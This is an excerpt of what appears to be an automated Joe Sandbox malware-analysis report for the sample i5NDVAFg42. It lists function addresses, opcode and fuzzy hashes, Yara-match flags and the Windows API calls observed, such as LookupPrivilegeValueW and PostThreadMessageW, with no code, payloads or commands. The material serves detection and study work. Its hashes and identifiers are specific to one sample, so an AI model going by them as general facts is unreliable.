                                                              • Instruction Fuzzy Hash: 9DD012752002186BD710EBD8CC45EA7776CEF44750F154455BA1C5B242C530F50086E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e65f3187a80e65322745a84d915946ec9bc6b58d175e5933dae3abbeb1c82eca
                                                              • Instruction ID: ff9ab6420f54643dbd7d249b8bc3df1e66f5096b634ff15415f738a077b02d68
                                                              • Opcode Fuzzy Hash: e65f3187a80e65322745a84d915946ec9bc6b58d175e5933dae3abbeb1c82eca
                                                              • Instruction Fuzzy Hash: 4490026520641403420571584414616802A97E0201B55C031E10145A0DC5258A916227
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2b12e22b8a5646ed9fe0cb1d46f21e521c5dcd9a3b5b04f476d9613a7978a874
                                                              • Instruction ID: 192c19de5cd2e54edb70a410388627d677ecf7e91c8ae0b812837abcfcdf2a92
                                                              • Opcode Fuzzy Hash: 2b12e22b8a5646ed9fe0cb1d46f21e521c5dcd9a3b5b04f476d9613a7978a874
                                                              • Instruction Fuzzy Hash: 5D90023520541C02D2807158440464A402597D1301F95C025E0025664DCA158B5977A3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 6b364601aac000bb7b740e17eaa83a81f66d83dc7aabbfffc9c66e3bd73626eb
                                                              • Instruction ID: b9979bec5677a83a214b2ba7d440712856a95e6297468550018a3e3d7399abaf
                                                              • Opcode Fuzzy Hash: 6b364601aac000bb7b740e17eaa83a81f66d83dc7aabbfffc9c66e3bd73626eb
                                                              • Instruction Fuzzy Hash: FE900229215414030205B5580704507406697D5351355C031F1015560CD6218A615223
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c845b55f50aa3dd25ce9e56a7c50e06a2179d6a118ddf97ac2146a1ee6e1eb1a
                                                              • Instruction ID: fdd1fa98d5dc2f6a3ddd8bfa6e28c169a74c0281e8cbf5dd54d816b51812ed1b
                                                              • Opcode Fuzzy Hash: c845b55f50aa3dd25ce9e56a7c50e06a2179d6a118ddf97ac2146a1ee6e1eb1a
                                                              • Instruction Fuzzy Hash: 7A90022530541403D240715854186068025E7E1301F55D021E0414564CD9158A565323
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 1ecbc3d4767246b8e9691ce71cfbd7c8c809d3ce46c9263f3883b9847be0cfe5
                                                              • Instruction ID: 615d53b83146f51d06394c2d0a184e095e66be4ff4c9fb9769a9b11683de30a7
                                                              • Opcode Fuzzy Hash: 1ecbc3d4767246b8e9691ce71cfbd7c8c809d3ce46c9263f3883b9847be0cfe5
                                                              • Instruction Fuzzy Hash: 2F90022D21741402D2807158540860A402597D1202F95D425E0015568CC9158A695323
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c42408b30133e4894fcf01ffe86c7ea04ab1907aa4c72abcce30341976bce344
                                                              • Instruction ID: 64a59ea78afbfd2ebc1b4a7d9e7fb4c44385a159f1e6eea2892ba5720765a871
                                                              • Opcode Fuzzy Hash: c42408b30133e4894fcf01ffe86c7ea04ab1907aa4c72abcce30341976bce344
                                                              • Instruction Fuzzy Hash: 1E90023520541813D21171584504707402997D0241F95C422E0424568DD6568B52A223
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 2f2b572f8e47dbbfb6f6c47bb558c7784c2b11596835c0738a1f32f28ac6cc92
                                                              • Instruction ID: 5a7fb446c116ffc1e40859f8a1eaed57e5e1ba684cc5d3b5c6c60bc4e15eefe9
                                                              • Opcode Fuzzy Hash: 2f2b572f8e47dbbfb6f6c47bb558c7784c2b11596835c0738a1f32f28ac6cc92
                                                              • Instruction Fuzzy Hash: E4900225246455525645B15844045078026A7E0241795C022E1414960CC5269A56D723
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: ef723d930a3e7cbdfd82453aefa78692ba86d047aed76f968bc473975c475c1b
                                                              • Instruction ID: 6cabe0933793174898896c693f212cc89bf5bb9e06ee9dd500261cc68aa00ce3
                                                              • Opcode Fuzzy Hash: ef723d930a3e7cbdfd82453aefa78692ba86d047aed76f968bc473975c475c1b
                                                              • Instruction Fuzzy Hash: 0890023520549C02D2107158840474A402597D0301F59C421E4424668DC6958A917223
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 5ef5a747c0856876ff12022b1fc75b3d8e91d4b0617f13d53436d77f6e1ca5e7
                                                              • Instruction ID: ecb50a1cd38f8495cbc5110ab8ab3c242a18ac5fb004f8814925174377b75f9b
                                                              • Opcode Fuzzy Hash: 5ef5a747c0856876ff12022b1fc75b3d8e91d4b0617f13d53436d77f6e1ca5e7
                                                              • Instruction Fuzzy Hash: DB90023520541802D20075985408646402597E0301F55D021E5024565EC6658A916233
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c7307d23d24a95adc396571c21d325cec40821d7865732c7e94c74cde592904b
                                                              • Instruction ID: 4aabd9fdff250f4805a1de410eb155064d42f3005ed0e45972cb367193d9a0ec
                                                              • Opcode Fuzzy Hash: c7307d23d24a95adc396571c21d325cec40821d7865732c7e94c74cde592904b
                                                              • Instruction Fuzzy Hash: F190026534541842D20071584414B064025D7E1301F55C025E1064564DC619CE526227
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 38e23a022c8db4cf7f047d5cc06ffa07c631acfcc1081fd2260833950d414f6f
                                                              • Instruction ID: 70d7fc91e2ea36826731250ba35439a9975ddbe2f2ab65fd24c3a4ba07da3b9c
                                                              • Opcode Fuzzy Hash: 38e23a022c8db4cf7f047d5cc06ffa07c631acfcc1081fd2260833950d414f6f
                                                              • Instruction Fuzzy Hash: 00900225215C1442D30075684C14B07402597D0303F55C125E0154564CC9158A615623
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3d4606e068fbeb50c51fa6d0c7fb224084f590a3df2a8e23f4ca44550a8fe410
                                                              • Instruction ID: 10ee1cdd306dd6d1e335201530c8fc77a6b3c0f33f4658e053e166e4d8ae57ef
                                                              • Opcode Fuzzy Hash: 3d4606e068fbeb50c51fa6d0c7fb224084f590a3df2a8e23f4ca44550a8fe410
                                                              • Instruction Fuzzy Hash: 86900225605414424240716888449068025BBE1211755C131E0998560DC5598A655767
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: e4eed06e53e36fba5bd21176205ce15698b0d25fd5a23b8f9970df00f4fb91c6
                                                              • Instruction ID: adcb4893144d5c43a5569041850af221bd19e3269f3fb7f7ee952137dac14846
                                                              • Opcode Fuzzy Hash: e4eed06e53e36fba5bd21176205ce15698b0d25fd5a23b8f9970df00f4fb91c6
                                                              • Instruction Fuzzy Hash: 0490023520581802D2007158481470B402597D0302F55C021E1164565DC6258A516673
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7b51f1bcea160323d9fd645ea22588ed2c1740b91c0c826943534fc667c24783
                                                              • Instruction ID: 4a64ec9fc436dbbbdc80c285728ec7eaf26b25feb0808e9c7c7f74ef4ba85adc
                                                              • Opcode Fuzzy Hash: 7b51f1bcea160323d9fd645ea22588ed2c1740b91c0c826943534fc667c24783
                                                              • Instruction Fuzzy Hash: A690027520541802D24071584404746402597D0301F55C021E5064564EC6598FD56767
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 017C2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2046523999.0000000001750000.00000040.00001000.00020000.00000000.sdmp, Offset: 01750000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_1750000_i5NDVAFg42.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 7da18654526829f4db3b4048bef6f8b575c25eddabf5401512ba24bc0ce53369
                                                              • Instruction ID: cbbf40235a21b8e0c35a9779bb2bb2a534d57bb4a7a3827482df57f54dafce3a
                                                              • Opcode Fuzzy Hash: 7da18654526829f4db3b4048bef6f8b575c25eddabf5401512ba24bc0ce53369
                                                              • Instruction Fuzzy Hash: 5390022560541902D20171584404616402A97D0241F95C032E1024565ECA258B92A233
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CE9AB0 Relevance: .1, Instructions: 92COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4ed878d8682106b50380cb3f7a3660dbe535b89e10b8b11201fef7fd01b0729b
                                                              • Instruction ID: 1c3b6e7510b7898cb30ac35b55ac15431465dea77c1fa0582108dbf48e9057c6
                                                              • Opcode Fuzzy Hash: 4ed878d8682106b50380cb3f7a3660dbe535b89e10b8b11201fef7fd01b0729b
                                                              • Instruction Fuzzy Hash: E22105B2D402485BCB25D665AD92AFF73BCEF50304F04016DEA5993142F634AB099BB2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CE8308 Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 210 ce8308-ce835a call cfbe60 call cfca00 call ceacf0 call cf4e50 219 ce838e-ce8392 210->219 220 ce835c-ce836e PostThreadMessageW 210->220 221 ce838d 220->221 222 ce8370-ce838a call cea480 220->222 221->219 222->221
                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 00CE836A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: 3652f5063e7420592e5ed941896d8be1a842ecbfb45ce89cbd134adf593fc7ce
                                                              • Instruction ID: ab2bc7261d57b3e5b39473cc868d9b747cc0bab207bb02233d917b2f0ee6ca27
                                                              • Opcode Fuzzy Hash: 3652f5063e7420592e5ed941896d8be1a842ecbfb45ce89cbd134adf593fc7ce
                                                              • Instruction Fuzzy Hash: 1701D831A8026C7BE721A6949C43FFE776C6B00F51F050115FF08BA1C2EBD8690547E6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CE8310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 225 ce8310-ce831f 226 ce8328-ce835a call cfca00 call ceacf0 call cf4e50 225->226 227 ce8323 call cfbe60 225->227 234 ce838e-ce8392 226->234 235 ce835c-ce836e PostThreadMessageW 226->235 227->226 236 ce838d 235->236 237 ce8370-ce838a call cea480 235->237 236->234 237->236
                                                              APIs
                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 00CE836A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                              • Instruction ID: 38724aa1f73447f0e7a30276e4a1422ffa4d1f8c684ac07bb2dc5d21c10649c5
                                                              • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                              • Instruction Fuzzy Hash: 0201A731A8022C7BE721A6959C43FFE776C5B40F51F050115FF04BA1C1EAD47A0556F6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFA7C2 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 270 cfa7c2-cfa7ea call cfaf60 272 cfa7ef-cfa804 LookupPrivilegeValueW 270->272
                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,00CEF1D2,00CEF1D2,0000003C,00000000,?,00CE9D65), ref: 00CFA800
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: c2bf0afcd6b210e6050da096542cf81bb09f150e42e767c5e43b5e2650d02e06
                                                              • Instruction ID: f44d9374c498e1a134a9c70acea9defe38fb18d2d2a0397f3481b73fd9b83c03
                                                              • Opcode Fuzzy Hash: c2bf0afcd6b210e6050da096542cf81bb09f150e42e767c5e43b5e2650d02e06
                                                              • Instruction Fuzzy Hash: 89F0E5B5200259AFC710DF48CC84FD7B768DF84640F108194FE0C5B252C630A811C7F1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFA66A Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 273 cfa66a-cfa687 call cfaf60 275 cfa68c-cfa6a1 RtlFreeHeap 273->275
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00CE9CF3,?,?,00CE9CF3,00000060,00000000,00000000,?,?,00CE9CF3,?,00000000), ref: 00CFA69D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: 0f6725eb35f52b3fdc17333689a778d032c8229e468558adea3ffab8edd294ea
                                                              • Instruction ID: f78b021df705786f86a395b9c142145af19c1749aa1da41f3a7b49b00dc7b1fd
                                                              • Opcode Fuzzy Hash: 0f6725eb35f52b3fdc17333689a778d032c8229e468558adea3ffab8edd294ea
                                                              • Instruction Fuzzy Hash: 17E04FB52002046FD714DF98CC84EEB77AAEF88350F118555FA1C9B352C631E910CBB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFA670 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 279 cfa670-cfa686 280 cfa68c-cfa6a1 RtlFreeHeap 279->280 281 cfa687 call cfaf60 279->281 281->280
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00CE9CF3,?,?,00CE9CF3,00000060,00000000,00000000,?,?,00CE9CF3,?,00000000), ref: 00CFA69D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0
                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction ID: 344216baa69a47b1d9ff4853f3ee833026f600d9cb7e0fbd6635b5de50173e74
                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                              • Instruction Fuzzy Hash: 01E012B1200208ABDB18EF99CC49EA777ACEF88750F118558BA085B252C630E9108AB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFA630 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 276 cfa630-cfa661 call cfaf60 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00CF4536,?,00CF4CAF,00CF4CAF,?,00CF4536,?,?,?,?,?,00000000,00CE9CF3,?), ref: 00CFA65D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction ID: ba9f6a77d4c41165e6b14d59c8a237e50f07120b7850e6a506fd611740efc549
                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                              • Instruction Fuzzy Hash: FFE012B1200208ABDB14EF99CC41EA777ACEF88654F118558BA085B242C630F9108AB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00CFA7D0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,00CEF1D2,00CEF1D2,0000003C,00000000,?,00CE9D65), ref: 00CFA800
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2045676038.0000000000CE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CE0000, based on PE: true
                                                              • Associated: 00000000.00000002.2045553376.0000000000CE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2045997762.0000000000CFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2046021148.0000000000D00000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ce0000_i5NDVAFg42.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction ID: 8a6b1964a594eef3cb96d5cab121aa1741e1e4c3e3525fd35bb785d88c02eb44
                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                              • Instruction Fuzzy Hash: A9E01AB12002086BDB10DF89CC85EE777ADEF88650F118154BA0C5B241C930E8108BF5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

